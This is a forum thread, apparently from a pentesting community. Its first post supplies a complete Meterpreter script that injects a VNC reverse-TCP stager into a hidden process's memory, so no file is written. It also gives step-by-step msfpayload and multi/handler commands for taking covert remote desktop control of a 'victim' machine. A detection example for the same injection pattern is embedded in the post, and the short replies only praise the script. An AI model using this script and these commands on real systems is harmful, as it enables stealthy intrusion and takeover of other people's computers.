
Thread: vnc memory injection with meterpreter

  1. #1 hhmatt (Join Date: Jan 2010, Posts: 660)

    vnc memory injection with meterpreter

    Description:
    A script that utilizes memory injection to get a VNC session without losing your meterpreter session.

    I spent quite a bit of time trying to get vnc_oneport.rb working. Then I finally decided that vnc.rb worked great except for one thing: it created a file on the victim's machine, and you would have to manually delete it later. So I took the cool execution and injection feature that was in vnc_oneport.rb and ported it into vnc.rb.

    This is sort of a work in progress but I'll share what I've done so far to get it working. It's not as hard as it looks as long as you know how to get a meterpreter session.

    First we need to traverse to the directory that we will be putting our script into.

    Open a shell and type:
    Code:
    cd /pentest/exploits/framework3/scripts/meterpreter/
    Use whatever editor you're most comfortable with here, but keep the name the same.
    Code:
    nano vnc_mem.rb
    Now copy this:
    Code:
    # $Id: vnc_mem.rb 12-17-2009 hdm $
    
    #
    # Meterpreter script for obtaining a quick VNC session
    # Hybrid of vnc.rb and vnc_oneport.rb
    # Utilizes memory functions so no file is created
    # Known Issue: spawns metasploit courtesy shell on vnc server side (victim)
    # You can exit out of courtesy shell easily once you obtain a vnc session
    # All code written by H.D. Moore (hdm)
    # Edited by hhmatt
    #
    
    session = client
    
    #
    # Options
    #
    opts = Rex::Parser::Arguments.new(
            "-h"  => [ false,  "This help menu"],
            "-r"  => [ true,   "The IP of the system running Metasploit listening for the connect back"],
            "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4545)"],
    #       "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
            "-e"  => [ true,   "The process to run and inject into (default: notepad.exe)"]
    )
    
    #
    # Default parameters
    #
    
    runme    = "notepad.exe"
    rhost    = Rex::Socket.source_address("1.2.3.4")
    rport    = 4545
    #autoconn = true
    
    #
    # Option parsing
    #
    opts.parse(args) do |opt, idx, val|
            case opt
            when "-h"
                    print_line(opts.usage)
                    return
            when "-r"
                    rhost = val
            when "-p"
                    rport = val.to_i
    #       when "-D"
    #               autoconn = false
            when "-e"
                    runme = val
            end
    end
    
    #
    # Generate the VNC stager shellcode
    # Only the raw shellcode is injected; the PE wrapper is built just to
    # report its size, nothing is written to the victim's disk.
    #
    print_status("Creating a VNC stager: LHOST=#{rhost} LPORT=#{rport}")
    pay = client.framework.payloads.create("windows/vncinject/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw  = pay.generate
    
    exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
    print_status("VNC stager executable #{exe.length} bytes long")
    
    
    #
    # Create a host process (hidden) and write the stager into its memory
    #
    pid = client.sys.process.execute("#{runme}", nil, {'Hidden' => true}).pid
    print_status("Host process #{runme} has PID #{pid}")
    note = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
    mem  = note.memory.allocate(1024*32)
    
    print_status("Allocated memory at address #{"0x%.8x" % mem}")
    print_status("Writing the VNC stager into memory...")
    note.memory.write(mem, raw)
    
    
    #
    # Setup the multi/handler before starting the stager so the connect back
    # has something to land on
    #
    mul = client.framework.exploits.create("multi/handler")
    mul.datastore['PAYLOAD']   = "windows/vncinject/reverse_tcp"
    mul.datastore['LHOST']     = rhost
    mul.datastore['LPORT']     = rport
    mul.datastore['EXITFUNC']  = 'process'
    mul.datastore['ExitOnSession'] = true
    
    mul.exploit_simple(
            'Payload'        => mul.datastore['PAYLOAD'],
            'RunAsJob'       => true)
    
    #
    # Execute the agent by starting a thread at the injected code
    # (vnc.rb's final execute of a dropped "tempexe" is not needed here,
    # there is no file, and referencing tempexe would raise a NameError)
    #
    print_status("Creating a new thread within #{runme} to run the VNC stager...")
    note.thread.create(mem, 0)
    
    print_status("VNC stager running, waiting for the connect back to #{rhost}:#{rport}...")
    And paste it into your editor.

    Then you can save and exit:
    Code:
    Ctrl+o (the letter not the number zero)
    
    Ctrl+x
    Nothing more needs to be done, it will automatically load the script once metasploit starts.
    So let's start Metasploit!
    Code:
    /pentest/exploits/framework3/./msfconsole
    I'm using the reverse TCP Metasploit connection from an executable payload. You can use whatever method you know or have to give you a meterpreter session.

    Ok so let's get our meterpreter session started.
    Code:
    msf > use multi/handler
    
    msf(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    
    msf(handler) > show options
    At this point you will need to set LHOST and LPORT (remember to change these to match your network and port).
    LHOST is your attacker machine and LPORT is the port to listen on.
    Code:
    msf(handler) > set LHOST 192.168.1.100
    
    msf(handler) > set LPORT 81
    OK. Let's start our listener now.
    Code:
    msf(handler) > exploit
    At this point you should see something like this:
    Code:
    [*] Starting the payload handler...
    [*] Started Reverse Handler on port 81
    Now we need to run our executable on the victim machine to give us a meterpreter session.
    This is how I made my exe.
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=81 X > /tmp/meter.exe
    This is what you should get at the end:
    Code:
    meterpreter >
    This is a good point to make sure you're connected to the right machine.
    Code:
    meterpreter > ipconfig
    meterpreter > getuid
    If you need to know some of the main basic commands that meterpreter uses just type in a ? like this.
    Code:
    meterpreter > ?
    OK, now to see if our script is recognized.
    Code:
    meterpreter > run vnc_mem.rb -h
    This should post the scripts help options.
    Here's what I get:
    Code:
    OPTIONS:
    
        -e <opt>  The process to run and inject into (default: notepad.exe)
        -h        This help menu
        -p <opt>  The port on the remote host where Metasploit is listening (default: 4545)
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    Looks good, let's give it a run:
    Code:
    meterpreter > run vnc_mem.rb
    Success!
    At this point you should have a new window open in TightVNC with your victim's desktop and full control!
    You can also check back on meterpreter and see that you still have an active session. Sometimes you have to hit enter once or twice to see the prompt.

    Hope you get some useful information from this and happy hacking!
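The script above leaves no file on disk, but the sequence it performs (spawn a hidden host process, open it with PROCESS_ALL_ACCESS, write shellcode into freshly allocated memory, start a thread at that address) is exactly the footprint a remote-thread monitor records. The Ruby below is an added example written for this page, not code from the post or from Metasploit. It correlates constructed Sysmon-style events (EventID 1 ProcessCreate, 10 ProcessAccess, 8 CreateRemoteThread) that are flattened here into an assumed `key=value;key=value` line format, and flags a remote thread whose start address is not backed by any loaded module when the thread's creator also spawned the target or had opened it with the VM-write and thread-create rights injection needs. The pids, images and addresses in the sample log are made up.

```ruby
# Added example (not from the original post or from Metasploit): detect the
# footprint of a memory-injected stager from Sysmon-style events.
# Assumed flattened format: one event per line, fields as key=value joined by ';'.
# Field names follow Sysmon EventID 1 (ProcessCreate), 10 (ProcessAccess) and
# 8 (CreateRemoteThread); real Sysmon output is XML/EVTX and would need a
# proper exporter in front of this.

# Access rights an injector needs on the target process:
# PROCESS_CREATE_THREAD (0x2), PROCESS_VM_OPERATION (0x8), PROCESS_VM_WRITE (0x20).
INJECT_RIGHTS = 0x2 | 0x8 | 0x20

# Constructed sample log: pids 3108 (injector) and 1432 (hidden host process)
# mirror the script's behaviour; pid 1500 is a benign notepad.exe whose
# remote thread starts inside ntdll.dll and must not be flagged.
SAMPLE_LOG = <<~'LOG'
  EventID=1;ProcessId=3108;Image=C:\Users\victim\Downloads\meter.exe;ParentProcessId=2204;ParentImage=C:\Windows\explorer.exe
  EventID=1;ProcessId=1432;Image=C:\Windows\System32\notepad.exe;ParentProcessId=3108;ParentImage=C:\Users\victim\Downloads\meter.exe
  EventID=10;SourceProcessId=3108;SourceImage=C:\Users\victim\Downloads\meter.exe;TargetProcessId=1432;TargetImage=C:\Windows\System32\notepad.exe;GrantedAccess=0x1FFFFF
  EventID=8;SourceProcessId=3108;SourceImage=C:\Users\victim\Downloads\meter.exe;TargetProcessId=1432;TargetImage=C:\Windows\System32\notepad.exe;StartAddress=0x00320000;StartModule=;StartFunction=
  EventID=1;ProcessId=1500;Image=C:\Windows\System32\notepad.exe;ParentProcessId=2204;ParentImage=C:\Windows\explorer.exe
  EventID=8;SourceProcessId=812;SourceImage=C:\Windows\System32\csrss.exe;TargetProcessId=1500;TargetImage=C:\Windows\System32\notepad.exe;StartAddress=0x77C12A40;StartModule=C:\Windows\System32\ntdll.dll;StartFunction=RtlUserThreadStart
LOG

# Parse one "k=v;k=v" line into a hash of strings (empty values stay "").
def parse_event(line)
  line.strip.split(';').each_with_object({}) do |field, ev|
    key, value = field.split('=', 2)
    ev[key] = value.to_s
  end
end

def parse_log(text)
  text.each_line.map(&:strip).reject(&:empty?).map { |l| parse_event(l) }
end

# Returns one finding per remote thread that (a) starts in memory not backed
# by any loaded module and (b) was created by a process that either spawned
# the target or had opened it with the rights needed to write code into it.
def detect_remote_thread_injection(events)
  created_by = {}                            # target pid => parent pid
  writers    = Hash.new { |h, k| h[k] = [] } # target pid => pids granted INJECT_RIGHTS
  findings   = []

  events.each do |ev|
    case ev['EventID']
    when '1'
      created_by[ev['ProcessId']] = ev['ParentProcessId']
    when '10'
      granted = ev['GrantedAccess'].to_i(16)
      writers[ev['TargetProcessId']] << ev['SourceProcessId'] if (granted & INJECT_RIGHTS) == INJECT_RIGHTS
    when '8'
      src, dst = ev['SourceProcessId'], ev['TargetProcessId']
      # memory.allocate + thread.create leaves StartModule empty: the entry
      # point is anonymous memory, not an exported function of a DLL.
      unmapped_start = ev['StartModule'].to_s.empty?
      spawned        = created_by[dst] == src
      had_rights     = writers[dst].include?(src)
      next unless unmapped_start && (spawned || had_rights)
      findings << {
        target_pid: dst, target_image: ev['TargetImage'],
        source_pid: src, source_image: ev['SourceImage'],
        start_address: ev['StartAddress'],
        spawned_by_injector: spawned, had_inject_rights: had_rights
      }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  detect_remote_thread_injection(parse_log(SAMPLE_LOG)).each do |f|
    puts "ALERT: #{f[:source_image]} (pid #{f[:source_pid]}) started a thread at " \
         "#{f[:start_address]} in #{f[:target_image]} (pid #{f[:target_pid]}); " \
         "start address is not module-backed" \
         "#{f[:spawned_by_injector] ? ', target was spawned by the injector' : ''}"
  end
end
```

The rule deliberately keys on the empty StartModule plus the parent or access relationship rather than on notepad.exe: the script's -e option lets the operator pick any host process, and legitimate remote threads (debuggers, the CSRSS example above) start at a module-backed address such as ntdll!RtlUserThreadStart. The 0x1FFFFF mask in the sample corresponds to PROCESS_ALL_ACCESS on Vista and later; the check tests only for the three rights injection needs, so the older 0x1F0FFF value also matches.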

  2. #2 cRaZylilmuffin (Join Date: Mar 2010, Posts: 38)

    Cool, I'll have to try it out.
    "Things are not what they appear to be: nor are they otherwise." -Surangama Sutra

  3. #3 (Join Date: Feb 2009, Posts: 356)

    Great work, dude! Nice merge between the .rb's.

  4. #4 hhmatt (Join Date: Jan 2010, Posts: 660)

    Thanks, I'm glad you liked it.
